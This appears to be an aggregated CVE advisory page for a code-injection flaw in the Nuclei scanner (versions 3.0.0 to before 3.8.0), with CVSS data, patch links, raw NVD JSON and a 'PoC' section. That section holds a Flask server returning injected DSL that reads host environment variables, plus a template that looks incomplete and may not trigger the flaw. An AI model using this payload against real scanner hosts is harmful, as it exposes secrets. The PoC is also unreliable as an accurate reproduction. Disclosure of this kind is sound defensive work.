Security Vulnerability Report
CVE-2026-41645 CVSS 5.3 MEDIUM

CVE-2026-41645

Published: 2026-05-08 04:16:18
Last Modified: 2026-05-08 19:42:50

Description

Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's expression evaluation engine makes it possible for a malicious target server to inject and execute supported DSL expressions. This happens when HTTP response data containing helper/function syntax gets reused by multi-step templates. If the -env-vars / -ev option is explicitly enabled, this can expose host environment variables. That option is off by default, so standard configurations are not affected by the information disclosure risk. This issue has been patched in version 3.8.0.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
Weakness: CWE-94 (Improper Control of Generation of Code, 'Code Injection')

Configurations (Affected Products)

cpe:2.3:a:projectdiscovery:nuclei:*:*:*:*:*:go:*:* - VULNERABLE
Nuclei >= 3.0.0, < 3.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept: Malicious Server and Vulnerable Template

# 1. Malicious Server (Python Flask)
# This server returns a response containing Nuclei DSL syntax.
from flask import Flask

app = Flask(__name__)


@app.route('/')
def exploit():
    # Injecting DSL syntax to read environment variable 'PATH'
    # This works if -env-vars is enabled on the scanner
    return '{"result": "{{env(\"PATH\")}}"}'


if __name__ == '__main__':
    app.run(port=8080)

yaml
# 2. Vulnerable Nuclei Template (multi-step)
# This template reuses the response data, triggering the evaluation.
id: CVE-2026-41645-poc

info:
  name: Nuclei DSL Injection PoC
  severity: high

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      # The output of the previous request (containing {{env("PATH")}})
      # might be evaluated if processed by internal helpers or matched incorrectly
      # in a complex multi-step scenario.
      - type: word
        words:
          - "/usr/local/bin"

References

https://github.com/projectdiscovery/nuclei/commit/6c803c74d193f85f8a6d9803ce493fd302cad0eb (Patch)
https://github.com/projectdiscovery/nuclei/commit/d2217320162d5782ca7cb95bef9dda17063818f3 (Patch)
https://github.com/projectdiscovery/nuclei/pull/7221 (Issue Tracking, Patch)
https://github.com/projectdiscovery/nuclei/pull/7321 (Issue Tracking, Patch)
https://github.com/projectdiscovery/nuclei/releases/tag/v3.8.0 (Product, Release Notes)
https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-jm34-66cf-qpvr (Mitigation, Patch, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-41645",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T04:16:18.177",
    "lastModified": "2026-05-08T19:42:49.960",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's expression evaluation engine makes it possible for a malicious target server to inject and execute supported DSL expressions. This happens when HTTP response data containing helper/function syntax gets reused by multi-step templates. If the -env-vars / -ev option is explicitly enabled, this can expose host environment variables. That option is off by default, so standard configurations are not affected by the information disclosure risk. This issue has been patched in version 3.8.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:projectdiscovery:nuclei:*:*:*:*:*:go:*:*",
                "versionStartIncluding": "3.0.0",
                "versionEndExcluding": "3.8.0",
                "matchCriteriaId": "9E442141-1965-481A-BE82-B6DC11B58EAC"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/projectdiscovery/nuclei/commit/6c803c74d193f85f8a6d9803ce493fd302cad0eb",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/projectdiscovery/nuclei/commit/d2217320162d5782ca7cb95bef9dda17063818f3",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/projectdiscovery/nuclei/pull/7221",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://github.com/projectdiscovery/nuclei/pull/7321",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://github.com/projectdiscovery/nuclei/releases/tag/v3.8.0",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-jm34-66cf-qpvr",
        "source": "[email protected]",
        "tags": ["Mitigation", "Patch", "Vendor Advisory"]
      }
    ]
  }
}